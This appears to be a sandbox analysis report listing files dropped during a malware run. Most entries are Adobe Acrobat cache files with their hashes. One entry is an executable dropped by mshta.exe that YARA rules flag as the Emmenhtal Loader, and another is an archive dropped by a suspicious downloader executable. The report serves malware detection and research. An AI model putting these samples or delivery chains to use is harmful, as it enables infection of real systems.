                                              SHA-256:4EEA00CE427EDCB94858D312801157DF8BDF082B352BFD5121CD92C97136BCAD
                                              SHA-512:E24FD70427D30B4138C3184B2A93528BF19DD74D01254192784E55D68BBF72B7BA64F4B7F68A30F08A4A47552991A798971E4A0D0DBE5CBE6935348DD4E420A6
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.310286708353901
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfYdPeUkwRe9:YvXKXFJuWkZc0vjGg8Ukee9
                                              MD5:6CCDAFBE48A7D621DA9C1EDFFD054774
                                              SHA1:0DA5E5E6BCFD9C27AA85833A27EC6D38C14C77D8
                                              SHA-256:44B74EF5F86B62A4442A86B90F281558D274AE1CB73B6CCD2007EDF67C5C939D
                                              SHA-512:8138202273A3E5F2BDAD398BD87633205A06D9385960FA8B745AE3D169CD2D9821C8E9EAC2984D4C8C733CA2D8628F1525DDC081C01533806B42C5711C0215E8
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):284
                                              Entropy (8bit):5.296200483664049
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJf+dPeUkwRe9:YvXKXFJuWkZc0vjG28Ukee9
                                              MD5:62B637B3589A19A9644019E424E1D813
                                              SHA1:2FDD1F4283F5EEEB03FE8627611440AC339143C7
                                              SHA-256:B01833BF137D891F170EC34DA7CD4AB872F71D818D086FAA35AAFB3F7CAE0C3B
                                              SHA-512:B9D150212D57569EB68A93D77F044C99BB417A958EFA1A53937A160751018941BF79A1D49A5FA132CF89EBE42A035D91E978CDDB59BBBDBF1875DADC3D61E8F6
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):291
                                              Entropy (8bit):5.2937631070012765
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfbPtdPeUkwRe9:YvXKXFJuWkZc0vjGDV8Ukee9
                                              MD5:A61D80D01555384B515FE8F86CA055E1
                                              SHA1:B1A809C139DF867E6435417E5EDB266DBDD42211
                                              SHA-256:EDF7140BBCA03C8AB1A4C93DA946522D7A830FFAE583F9595AE40B605AF1C786
                                              SHA-512:6D0D45D9874FBB818203805E24EE94D398F754F0E9A730EF3BA8D64652ABF569DD9126381BA76CA0547242B428DEED2C12D4FB927EC2A3E6CBEB905603BD5ECA
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):287
                                              Entropy (8bit):5.2991322197961095
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJf21rPeUkwRe9:YvXKXFJuWkZc0vjG+16Ukee9
                                              MD5:AA5B630CFBA0B6340E9BA20E359204E0
                                              SHA1:8EBB95F85FDB38EAC1C56618595E9D1D297BF347
                                              SHA-256:47CD38D0D156A9A344EE16FF6243C7ADE6384A3903B292831DCF1643C165887A
                                              SHA-512:48E3A73C8D4FD6E74B7929804937725995E1B517B3878D33C3EB26132ACF62C4D4B35FA574A9CE023025AC27028D2D2C05A743832DBE6903543874D785AB8946
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1090
                                              Entropy (8bit):5.663665972612904
                                              Encrypted:false
                                              SSDEEP:24:Yv6XPunzvMamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS2:YvUYyBgkDMUJUAh8cvM2
                                              MD5:AB2A6AD0176061240E4DA85973E60A2B
                                              SHA1:D7727F17650362A031286B1EA027F2F08C8ABA72
                                              SHA-256:714224351BC8B98100412C7802CA6C1566F7F03012F4436D4823B8421EDEE6E6
                                              SHA-512:E5C21AE8CCC9126E98BCA4F71A1249461F6F808ACAB4C0FE498B6172DF259B25C1E3D9ACDD25E3E857DF5034E9AB3EF596A623E4B9936795E9886AEF4A486C7E
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):286
                                              Entropy (8bit):5.272777459700605
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfshHHrPeUkwRe9:YvXKXFJuWkZc0vjGUUUkee9
                                              MD5:E354388E7DC713F4EADA8DE5E82235B9
                                              SHA1:CA0CF00D953F136F31166A8230F87D100876BE4C
                                              SHA-256:9CF40654ED2DC23895D281D314109BB20B1CB10A479F6C2210E65513E2E43074
                                              SHA-512:03892CF46B21175E817C36AF4A0BDE7C39FFEFC3AC241D519E30A015E6BEA714D157D6223D4AC236B77FEC838549E56E60C627FBE3A59A9901291F3FE4CB6DDB
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):282
                                              Entropy (8bit):5.2808559843194365
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJTqgFCrPeUkwRe9:YvXKXFJuWkZc0vjGTq16Ukee9
                                              MD5:D94FF5B0EF1483401597DD66DD715EA7
                                              SHA1:74969632DA8C4F9AAEC035CCBD7E049EBDC23DAC
                                              SHA-256:015A44A0DEEEDA9FFEAED9C627F70B6328DF9383DE0F40A7EDF57BA72FD42D81
                                              SHA-512:33DE31287D301EC26AD84ACDA5338033FD578A0F129052BF8865A108B4C62038150CB0E6F63DC43832B1DCA9C2DB413FF504BF096C175904ACA8CEB2706E2A04
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4
                                              Entropy (8bit):0.8112781244591328
                                              Encrypted:false
                                              SSDEEP:3:e:e
                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                              Malicious:false
                                              Preview:....
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):2814
                                              Entropy (8bit):5.141019237621888
                                              Encrypted:false
                                              SSDEEP:24:YMnvGasmayETJ7DeBBqMJOcYkkjxv3v3oAPjb3j0SSfNYzC2o12LSSRCRLX5QCKF:YBRe3zOc+JrbzUfF1COJV4v95
                                              MD5:B28B8C5F77326243E8C1834E4488596B
                                              SHA1:907DE143FF4333040D1884EB6409226FBCAB71DF
                                              SHA-256:82F4B31826848A8CB05392D2FF90093FE1AD32F32278DB39BADE196FC0C908D1
                                              SHA-512:885EF6D8EEE62BE5E0D34428F0F0307B48C44F9B1FBABEA0A154E597F33AB00FD524806ADD559133CF84AC4B41318284AAD2E3DDF86003A3C7C14FD70AC74899
                                              Malicious:false
                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"a5e444134f07c99cdcbf6207a6bd76d8","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736070249000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7d05a432e2f367456846041237354966","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736070249000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d4dbf4aa6433e25deda890b014512855","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736070249000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"68e1f0df2f2488314d85b2489aa6c91e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736070249000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a2cb6d219337b5de5a9a83c2a9d20e5f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736070249000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"61dc1b24f98d14a1e7184efdd60ba2c9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):1.18661590605189
                                              Encrypted:false
                                              SSDEEP:48:TGufl2GL7msEHUUUUUUUUiSvR9H9vxFGiDIAEkGVvp4:lNVmswUUUUUUUUi+FGSItE
                                              MD5:648577C521C75EAA64ACD5F574194ECE
                                              SHA1:D6D300B6741286431FCA03D69645285B5DBCBC32
                                              SHA-256:49A69E58225F7D66BD30E409B15AA81285C4EA13A179766E6BF2C33C38D67C90
                                              SHA-512:1D1DD713079D42DDE081A82C3062ED2D9F8439302EC7AB873D335ED3A25EC967C44E4D7003C4604ABCC78DB6884FD67E06F44C5E2C91998D8A34D0B7B3ED8866
                                              Malicious:false
                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite Rollback Journal
                                              Category:dropped
                                              Size (bytes):8720
                                              Entropy (8bit):1.6070492881431113
                                              Encrypted:false
                                              SSDEEP:48:7M6KUUUUUUUUUUwvR9H9vxFGiDIAEkGVvU5qFl2GL7msa:7qUUUUUUUUUUIFGSItEKVmsa
                                              MD5:46B1B60F970914220D61E7FD8BF51D8A
                                              SHA1:79DEC0080D195C027B59BE7DDB2DCBD040CCAAF2
                                              SHA-256:861FF62735C8B4C9F5A5948D22785CAF5F0802B7FF625BA4D5ABFDFF0301C498
                                              SHA-512:3D1F1AF39E2CE6A753086BCAAF44AE5D30DA4E9090C8B4BD51C303918101F0B17634C1FFBA66E56558B710583939391E311DAA4865D69B2CCED09C387E32BAE4
                                              Malicious:false
                                              Preview:.... .c.......).......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):66726
                                              Entropy (8bit):5.392739213842091
                                              Encrypted:false
                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgud3bs/VbbxPmpHdYdQrJDQbYyu:6a6TZ44ADEudLs/VbbxoXsK
                                              MD5:67CBDE3EDCAD58743D838DD419C58655
                                              SHA1:E0553E7B45055EC2724B032FA9BD33F6BCD51F0A
                                              SHA-256:941EFAE689E05C721B60B51267D79D5A1EE7C8655D180EAA0B1806300F5712CF
                                              SHA-512:14372F2B216C4B3D2D6A3CB3FDFC1570F74751B4B8CEC4B05162E1EB048BA2D2525726D4C942B3108CEB8C4CAEA0EA9287EB5C6307EACE2743E987E6A23AF27C
                                              Malicious:false
                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                              Process:C:\Windows\System32\mshta.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1434675
                                              Entropy (8bit):6.961837071515437
                                              Encrypted:false
                                              SSDEEP:24576:nuChr47tuChr47WuChr47CuChr47YuChr47:nuM47tuM47WuM47CuM47YuM47
                                              MD5:F74C9109DAE882D15088B4AD8E5BB29D
                                              SHA1:86A0F44B0A680422DF75A36909FBB396DF64C2D7
                                              SHA-256:FB04434388B4A26804151BA2E73B9D371B9FEA930541C08243560BAAC94C2FDB
                                              SHA-512:470153FFAC01DF9F8B8197F1F4489DAB0EE0806558D0736A0A5BA2CA07B7F1BF64BE7DC1F1555DF37874691FB0CC611AF91B16EBA01F53FED7BB3720A8D56E3D
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_EmmenhtalLoader, Description: Yara detected Emmenhtal Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], Author: Joe Security
                                              • Rule: emmenhtal_strings_hta_exe, Description: Emmenhtal Loader string, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], Author: Sekoia.io
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,.SXh.=.h.=.h.=...>.k.=...9...=...8.o.=...<.s.=.h.<...=...4.z.=.....i.=...?.i.=.Richh.=.................PE..L.....L......................l....................@..........................p......U`....@...... ...................................0..h'...................`...... -..T...........................(................................................text...D........................... ..`.data...d...........................@....idata...'.......(..................@..@.rsrc...h'...0...(..................@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                              Category:dropped
                                              Size (bytes):31886616
                                              Entropy (8bit):7.996327176919507
                                              Encrypted:true
                                              SSDEEP:786432:4Dz+kmvQr7HvMeqWGbmv9+0/NyvLkuPO/oNGtbogIX+xzBYR6GuSZ:4DzvmYr7HsbaYOYKHzBYR6GP
                                              MD5:29C9E2CDE366197C69D233D35E7B37EC
                                              SHA1:3D2F575DBCE04912774D71D89397D993BF60AAFB
                                              SHA-256:F5651BFB5DE738EA1A0E361EB2057DFAB93E0BAC52B3BEC67DFA7A329E1887E7
                                              SHA-512:D7EE3C97E72209537519E04E3D2182385E0B3A8BA575F0D581CEE3C1F82ABAD79E74BF02929C9356A93E71473A06AE4E7776E3353272FAF29EFD7FD8FDCB16A9
                                              Malicious:false
                                              Preview:PK.........b$Z................php-8.2.11-Win32-vs16-x64/PK..........:W.Y.........'...php-8.2.11-Win32-vs16-x64/deplister.exe.\i|T....%..M$.....6..@.&N.y.....H@.E$.Y..J..$.I4..(m.b.-...@[..."[....%...F4.&.....o&..]~..../..].=..s.=..s.}..o.,. X..uAh..?.......|g..\..&...[..[.\.j.Uw....V...9W..p....7c.....,.6##...1.'.l..{/..m.~:...=]..[O..^..gO.........I<......}o6.....m.=...............E..n..!.9J.b...F..ax8.. ....!.'....H..A.P.)^..54~APx.#.P4..n....A....&...&a.g........L.R.._..Z....7...[..8...U...%..~`..~..-x.....Z.L.:.:......E.]...>.....G..[8.'.*!.........Z.|E.......x_t.\....!.JXq9...+.ou9........E.3...)......2..U&G2..&A.D.F...D..(..?.._rhOA.~.oH-.v.].5.0..&9.s.....$...........2..H&A..r..V.../5.......J{..2.5O....)..j...}o.@K..8...#.......H..A].&y....q.m...IT.[.G.f..uxg...({t..Kl.n..........C.s.6.rmT..~.....xi.V<.2.....hp&.k.l.S..i...T..B...m+/s.}.'.8f.._......I.W.....I.].0.....^.P~..y.<..$.|.....}.l.....r......oLT.X.y...{.....H.Q.q..,....1H.k.
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):246
                                              Entropy (8bit):3.505069684106714
                                              Encrypted:false
                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8wWClQOnH:Qw946cPbiOxDlbYnuRKA+H
                                              MD5:99EFC675032ABAF75C0206F8F91CE035
                                              SHA1:8A08D38F542B2E1FE2CFA4DCA70940681A2F2AED
                                              SHA-256:EF25175DCAB42DB06F6255F08840416F0F1119920BDF0F9710CD79BD1CB37BCF
                                              SHA-512:976276ED390E590868D4C7D2DEDFC8A331BF5D88D5472B5F4850B54AFA07F2D6FD90A77AA09587DDE4CD7A447C6DC4603BB4D27649146E07B3A8A3002124F5E8
                                              Malicious:false
                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.5./.0.1./.2.0.2.5. . .0.4.:.4.4.:.1.1. .=.=.=.....
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                              Category:dropped
                                              Size (bytes):144514
                                              Entropy (8bit):7.992637131260696
                                              Encrypted:true
                                              SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                              MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                              SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                              SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                              SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                              Malicious:false
                                              Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with very long lines (393)
                                              Category:dropped
                                              Size (bytes):16525
                                              Entropy (8bit):5.345946398610936
                                              Encrypted:false
                                              SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                              MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                              SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                              SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                              SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                              Malicious:false
                                              Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):15114
                                              Entropy (8bit):5.330392107006663
                                              Encrypted:false
                                              SSDEEP:384:4ghn8ghK4ghKVghKQghKcghKxghKuVgh01gh0egh01Sgh0sgh0ggh0ughCLghCtb:ZhNhGh7hehUhhhlmh/hghsrhghmhmh5m
                                              MD5:1935B63B9FFA3DC86736074C38089368
                                              SHA1:3DA0A2C8512484A9F5F31B599AF287A390257233
                                              SHA-256:98DD5C20B117F5E1DC54A596958DFDA87720AC8FAA09D856F946416A9C33B66B
                                              SHA-512:260A55D00DAAB5FC7DB71AA7DFD6E5AE6EFB360233C33054C2725B97045C41DCA169D8EAF37FA7C9262CA6138D7998A8C237E27AD7AF6D2E1F0F281584B9CE48
                                              Malicious:false
